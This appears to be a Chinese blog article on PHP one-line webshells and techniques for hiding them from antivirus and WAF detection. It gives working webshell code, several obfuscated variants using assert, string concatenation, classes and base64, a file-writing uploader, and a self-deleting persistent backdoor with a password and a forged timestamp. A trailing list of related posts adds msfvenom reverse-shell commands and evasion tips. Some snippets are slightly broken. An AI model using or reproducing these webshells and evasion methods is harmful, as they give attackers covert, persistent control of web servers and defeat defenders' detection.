一句话木马及免杀

article/2025/9/24 2:06:49

这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。

文章目录

    • 一句话木马及原理
    • 一句话木马简单免杀
      • 一、assert()
      • 二、字符串拼接
      • 三、函数
      • 四、request请求
      • 五、类
      • 六、base64加解密
      • 七、写入木马
    • 不死马

一句话木马及原理

首先,来看最简单的一句话木马:

<?php @eval($_POST['cmd']); ?>

前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']应该都很熟悉了,通过cmd这个参数post提交数据。
举个例子,我在网站根目录下写入一句话木马
在这里插入图片描述
随后在127.0.0.1/index.php中,post提交cmd的数据为phpinfo();,出现了相应的界面,可以看到出现了命令执行漏洞。
在这里插入图片描述
除了这样命令执行,还可以用蚁剑、菜刀进行连接。

一句话木马简单免杀

从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。以下是几个免杀方法:

一、assert()

如果过滤了eval,可以使用assert绕过

assert() 会检查指定的 assertion 并在结果为true时执行

<?php @assert($_POST['cmd']); ?>

二、字符串拼接

当过滤了eval、assert两个关键字时,可以用字符串拼接的方式。介绍substr_replace()函数

substr_replace(string,replacement,start,length)

参数描述
string必需,规定检查的字符串。
replacement必需,规定要插入的字符串。
start必需,规定在字符串的何处开始替换。若为0,从头开始。
length可选。规定要替换多少个字符。默认是与字符串长度相同。
<?php$a=substr_replace("assexx","rt",4);@$a($_POST['cmd']);
?>

在这个马中,是将第四位和第五位,也就是xx替换成rt,最终拼接成为assert

除了substr_replace(),还有一种拼接方法

<?php$a="a"."s";$b="s"."e"."rt";$c=$a.$b;$c($_POST['cmd']);
?>

三、函数

可以利用函数来构造一句话木马

<?phpfunction shyshy($a){assert($a);}@shyshy($_POST['cmd']);
?>

先是构造了shyshy()这一函数,然后调用函数,变成一句话木马。

四、request请求

适用于过滤了GETPOST的情况下

<?php$a=$_REQUEST['cmd'];$b="\n";eval($b.=$a);
?>

五、类

可以构造一个类,利用魔术方法来拼接

<?phpclass shyshy{public $a='';function __destruct(){assert("this->$a");}}$b=new shyshy();$b->a=$_POST['cmd'];
?>

六、base64加解密

<?php$a=base_decode(YXNzZXJ0);$b=$a(base64_decode($_POST['cmd']));
?>

七、写入木马

<?phpif(isset($_POST['filename'])){$d='data';$$d=$_POST['text'];  //$data$f='fp';$$f=fopen($_POST['filename'],'wb');  //$fpecho fwrite($fp,$data):"save success":"save fail";fclose($fp);}
?>

这个代码通过在网站根目录下写一句话木马的方法,然后再去访问木马,从而getshell。

不死马

<?phpignore_user_abort(true);  //设置与客户机断开是否会终止脚本的执行,true则不会set_time_limit(0);  //如果为零说明永久执行直到程序结束unlink(__FILE__);  //调用unlink()的时候,文件还是存在的,只是目录里找不到该文件了,但是已经打开这个文件的进程可以正常读写$file='./.index1.php';$code='<?phpif(md5($_POST["pass"])=="xxxxxxxxxx")  //给木马设置密码,防止他人使用{@eval($_POST["cmd"]);}?>';  while(1){file_put_contents($file,$code);system('touch -m -d "2018-12-01 9:10:12" .index1.php');  //设置文件的编辑时间usleep(5000);}
?>

实测时发现设置文件编辑时间那里会报错,可以选择把那一句删掉。
用法:?pass=shyshy&cmd=phpinfo();


http://chatgpt.dhexx.cn/article/hAvgTOHA.shtml

相关文章

cobalt strike木马免杀

0x001-针对powershell免杀 工具&#xff1a;Invoke-Obfuscation 操作实例&#xff1a; 1、利用CS生成powershell木马 2、进入invoke-Obsfuscation文件&#xff0c;使用powershell命令执行 3、利用powershell命令执行免杀后的ps1文件&#xff0c;成功上线 0x002 -针…

一句话木马以及免杀

此篇只讨论php&#xff0c;其实原理是相同的&#xff0c;本文的思路依然适用于其他语言 WAF一般都是维护一个规则库&#xff0c;记录webshell常用的函数、方法等等&#xff0c;通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警&#xff0c;但是规则匹配肯定会…

Python木马分离免杀(下载分离型)

渗透环境&#xff1a; 目标主机&#xff1a;win10-192.168.159.133-杀软360、火绒、微步云沙盒 攻击主机&#xff1a;kali-192.168.159.129 使用工具&#xff1a;msfconsole、pyinstaller、pycharm 木马制作过程&#xff1a; 1、msfconsole的msfvenom模块生成shellcode k…

关于木马免杀的一些方法

一、免杀简述 ​ 理论上讲&#xff0c;免杀⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道&#xff0c;第⼀款杀毒软件 kill 1.0是Wish公司1987年推出的&#xff0c;也就是说免杀技术⾄少是在 1989年以后才发展起来的。 ​ 1989年&#xff1a;第⼀款杀毒软件M…

MSF木马的免杀(三)

目录 MSF木马的免杀 C/C加载免杀 加图标 MSF木马的免杀 MSF下输入下列命令&#xff0c;生成免杀shellcode msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOSTx.x.x.x LPORT8888 -e x86/shikata_ga_nai -i 15 -b \x00\ PrependMigratetrue Pre…

木马免杀平台

VirScan 《多引擎在线扫描平台》 访问&#xff1a;https://www.virscan.org/ VirusTotal 《威胁猎捕平台》 访问&#xff1a;https://www.virustotal.com/gui/home/upload Jotti 《恶意软件扫描系统》 访问&#xff1a;https://virusscan.jotti.org/ 腾讯哈勃分析系统 《文件…

绕过杀毒软件,免杀木马制作

绕过杀毒软件&#xff0c;免杀木马制作&#xff08;以AVG Anti Spyware杀毒软件为例&#xff09; 一、将Sever.exe打开&#xff0c;分块生成100个文件 二、使用AVG Anti Spyware查杀生成的文件&#xff0c;再二次处理&#xff0c;重复这个过程&#xff0c;直到缩小到很小的范围…

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOSTXXX LPORTXXX -e x86/shikata_ga_nai -i 12 -b \x00\ PrependMigratetrue PrependMIgrateProxsvchost.exe -f c > /root/Desktop/shellcode.c 这里我们生成…

后渗透-木马免杀

木马免杀 0x00 免杀 木马免杀的方法有很多种&#xff0c;如反转、异或、远程加载、加壳等&#xff0c;这里举例反转加异或 0x01 利用msfvenom制作木马 sfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.12.135 LPORT5555 -f py > 2.py# -p 指定payload # LHO…

APT之木马静态免杀

前言 这篇文章主要是记录手动编写代码进行木马免杀&#xff0c;使用工具也可以免杀&#xff0c;只不过太脚本小子了&#xff0c;而且工具的特征也容易被杀软抓到&#xff0c;指不定哪天就用不了了&#xff0c;所以要学一下手动去免杀木马&#xff0c;也方便以后开发一个只属于…

【木马免杀】

文章目录 前言题目一.免杀需求&#xff0c;查杀技术&#xff0c;免杀技巧&#xff0c;免杀实战免杀需求查杀技术免杀技巧免杀实战webshell免杀&#xff1a;1.引用免杀2.可变变量3.二维数组4.数组交集5.回调函数6.编码 木马免杀&#xff1a;1.msf自带免杀2.msf捆绑免杀3.msf自带…

2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么&#xff1f;因为怕你当真。。。 ---- 网易云热评 一、通过MSF生成shellcode 1、启动MSF&#xff0c;演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b \x00 l…

msf生成免杀木马

一.杀软原理 免杀概念免杀&#xff0c;也就是反病毒&#xff08;AntiVirus&#xff09;与反间谍&#xff08;AntiSpyware&#xff09;的对立面&#xff0c;英文为Anti-AntiVirus&#xff08;简写Virus AV&#xff09;&#xff0c;逐字翻译为“反-反病毒”&#xff0c;翻译为“…

052 木马免杀全攻略

木马免杀全攻略 转载自&#xff1a;a1pass.blog.163.com 2007-12-07 14:02:24| 分类&#xff1a; 思绪燃星火——技 | 标签&#xff1a;黑客 杂志刊物 作者&#xff1a;A1Pass 出处&#xff1a;http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》&#xff0c;与原…

渗透测试-木马免杀的几种方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

木马免杀方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

Kali渗透-MSF木马免杀技术

前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”&#xff0c;它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广&#xff0c;其中包含反汇编、逆向工程、系统漏洞等技术&#xff0c;内容基本上都是修改病毒、木马的内容改变特征码&#…

C语言C++制作游戏外挂,一个简单的内存外挂!

通过 C 语言编写一个简单的外挂&#xff0c;通过 API 函数修改游戏数据&#xff0c;从而实现作弊功能 对象分析 要用的 API 函数简单介绍 编写测试效果 总体评价 下面是小编整理好的一套C/C资料&#xff0c;加小编C/C编程学习群825414254获取系统性学习C/C的学习资料 对象分析…

使用MisakaPatcher制作Galgame外挂汉化补丁

简介 这两天我看见一个galgame机翻工具 MisakaTranslator&#xff0c;它类似VNR&#xff0c;使用C#编写并且支持Hook和OCR&#xff08;图像识别&#xff09;两种方法提取文本。 我在MisakaTranslator的基础上进行了一些改动&#xff0c;去除了所有的机翻的功能&#xff0c;转…

利用python编程,制作自己的游戏“外挂”!

Python简介及应用领域 Python是一种解释型脚本语言&#xff0c;可以应用于以下领域&#xff1a; Web 和 Internet开发科学计算和统计人工智能教育桌面界面开发软件开发后端开发网络爬虫 今天以一个小游戏和一小段代码来告诉大家编程有多好玩。 编程用的好&#xff0c;不仅可…